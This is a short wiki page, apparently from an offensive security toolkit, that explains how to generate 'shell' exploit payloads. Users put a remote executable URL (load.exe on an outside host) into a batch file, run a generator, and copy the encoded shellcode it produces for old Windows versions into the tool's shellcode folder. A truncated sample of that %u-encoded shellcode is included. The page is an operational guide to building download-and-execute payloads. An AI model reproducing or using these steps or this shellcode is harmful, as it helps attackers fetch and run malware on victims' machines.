Skip to content

Setting "Shell" exploits

Munir Njiru edited this page Jul 18, 2014 · 1 revision

This is located in the folder: progs/SHELLCODE_GEN

  • Open Payload.bat using notepad and put your http://mth3l3m3nt.com/load.exe (Replace with your url) then close.
  • Run beta.bat
  • go through the folders 2K-EN-0x77E70000, 95-EN-0xBFF70000, 98-EN-0xBFF70000 and open the text files there will be a shellcode e.g. below: "%u0feb%u8058%u8830%u8140%u6838%u6361%u756b%uebf4%ue805%uffec%uffff%u7861%u8888%ud088%u01dd%u096d%ua464%u8888%u0188%u5ccd%ucd4f%u8874%u7e88%u0337%u74cd%u09ee%uc5b0%ufdd2%u8df4%u88b4%u8888%u9...........................".
  • Delete the last full stop after the quote such that you have: "%u0feb%u8058%u8830%u8140%u6838%u6361%u756b%uebf4%ue805%uffec%uffff%u7861%u8888%ud088%u01dd%u096d%ua464%u8888%u0188%u5ccd%ucd4f%u8874%u7e88%u0337%u74cd%u09ee%uc5b0%ufdd2%u8df4%u88b4%u8888%u9..........................."
  • Once removed from all points text files, copy these folders into the mod/shell/shellcodes/ for usage.

Clone this wiki locally